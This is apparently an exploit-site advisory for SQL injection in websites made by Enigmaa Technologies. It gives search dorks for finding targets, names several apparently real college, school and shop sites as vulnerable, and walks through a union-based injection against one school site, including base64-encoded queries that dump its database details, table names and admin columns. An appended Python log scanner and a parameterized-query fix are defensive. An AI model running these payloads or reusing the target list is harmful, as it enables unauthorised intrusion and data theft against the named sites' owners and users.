Engineered by Enigmaa Technologies group BASE64 Sql injection Vulnerability

2019.04.08
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

===================================================================================================
# Title     : Engineered by Enigmaa Technologies group BASE64 Sql injection Vulnerability
# Author    : Dj3Bb4rAn0n (bassem) FB/djebbar.bassem.16
# Date      : /05/04/2019/
# Home      : Annaba ( algeria )
# Tested on : Linux ( backbox )
# Vendor    : Enigmaa Technologies group
# Dorks     : Engineered by : Enigmaa Tech Group | Powered by Enigmaa Technologies | Designed by Sphinx Technology
===================================================================================================

PoC :

Admin panel path : site.com/admin/login/
-----------------------

[ + ] Search in google using dorks above
[ + ] Payload [ ' ]
[ + ] Choose your target and look for injection point [ Encoded with base64 ]

Ex: www.bhbcollege.ac.in/fac.php?id=MTU= <====== Inject here

#######################
Example of vulnerable sites :
######################

[ + ] www.bhbcollege.ac.in/fac.php?id=MTU=
[ + ] www.bookmypuja.in/book.php?id=MzU=
[ + ] iconacademy.org/view.php?id=25
[ + ] www.krdcollege.in/view.php?id=23
[ + ] hdiedupublishers.com/product.php?id=63

############
Demo
############

# www.navjyotiroyalheritageschool.in/read.php?id=NTA=
# www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=50']
# www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=50']
# www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=50' -- -]

Fixable : ' -- -

Columns number is 12 :
-----------------------------
# www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=50' order by 12 -- -]

Vulnerable columns are : 3 | 4 | 6 | 11 | 12 |
-----------------------------------------------------
# www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=-50' Union Select 1,2,3,4,5,6,7,8,9,10,11,12 -- -]

Database | Version | user | Hostname :
------------------------------------------------
# www.navjyotiroyalheritageschool.in/read.php?id=[BASE64]=-50' Union Select 1,2,concat(database(),0x3c62723e,@@version,0x3c62723e,user(),0x3c62723e,@@Hostname),4,5,6,7,8,9,10,11,12 -- -]

Tables : [ Encoded with base64]
----------
# www.navjyotiroyalheritageschool.in/read.php?id=LTUwJyAgVW5pb24gU2VsZWN0IDEsMixncm91cF9jb25jYXQoMHgzYzYyNzIzZSx0YWJsZV9uYW1lKSw0LDUsNiw3LDgsOSwxMCwxMSwxMiBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSJta2NvbGN4Zl9uYXYiICAtLSAt

Columns : [ Encoded with base64]
------------
# http://www.navjyotiroyalheritageschool.in/read.php?id=LTUwJyAgVW5pb24gU2VsZWN0IDEsMixncm91cF9jb25jYXQoMHgzYzYyNzIzZSxjb2x1bW5fbmFtZSksNCw1LDYsNyw4LDksMTAsMTEsMTIgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSJhZG1pbiIgIC0tIC0=

######## Greetz to : Lakarha_23 | mohammed pazzo | Ja gar #######
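Because the `id` value is base64-wrapped, the quote and keywords never appear in the raw URL, so signature matching on the request line misses them. The following is an added example, not part of the original advisory or the vendor's code: a log check that decodes the `id` parameter and flags anything that is not a bare integer. The function names and the log lines are constructed for illustration (documentation IP address, combined log format assumed).

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlsplit

INT_RE = re.compile(r"[0-9]{1,10}")            # the only shape a record id should have
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def classify_id(raw):
    """Classify one raw id= value; returns (verdict, decoded_text_or_None)."""
    if INT_RE.fullmatch(raw):
        return "ok-plain", raw
    try:
        decoded = base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return "reject-undecodable", None
    if INT_RE.fullmatch(decoded):
        return "ok-base64", decoded
    return "suspicious", decoded               # decoded text is not a bare integer


def scan(lines, param="id"):
    """Return (line_number, verdict, decoded) for every request worth a look."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQ_RE.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        for raw in query.get(param, []):
            verdict, decoded = classify_id(raw)
            if not verdict.startswith("ok"):
                findings.append((number, verdict, decoded))
    return findings


def _log_line(value):
    # Constructed sample entry (documentation IP address), not real traffic.
    target = "/read.php?id=" + quote(value, safe="=")
    return f'203.0.113.7 - - [08/Apr/2019:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512'


def _b64(text):
    return base64.b64encode(text.encode()).decode()


SAMPLE_LOG = [_log_line(v) for v in
              ("NTA=", "25", _b64("50'"), _b64("50' order by 12 -- -"), "NTA")]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same decode-then-validate step belongs in the application itself: reject any `id` whose decoded value is not an integer and pass the integer to a parameterized query.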



Copyright 2019, cxsecurity.com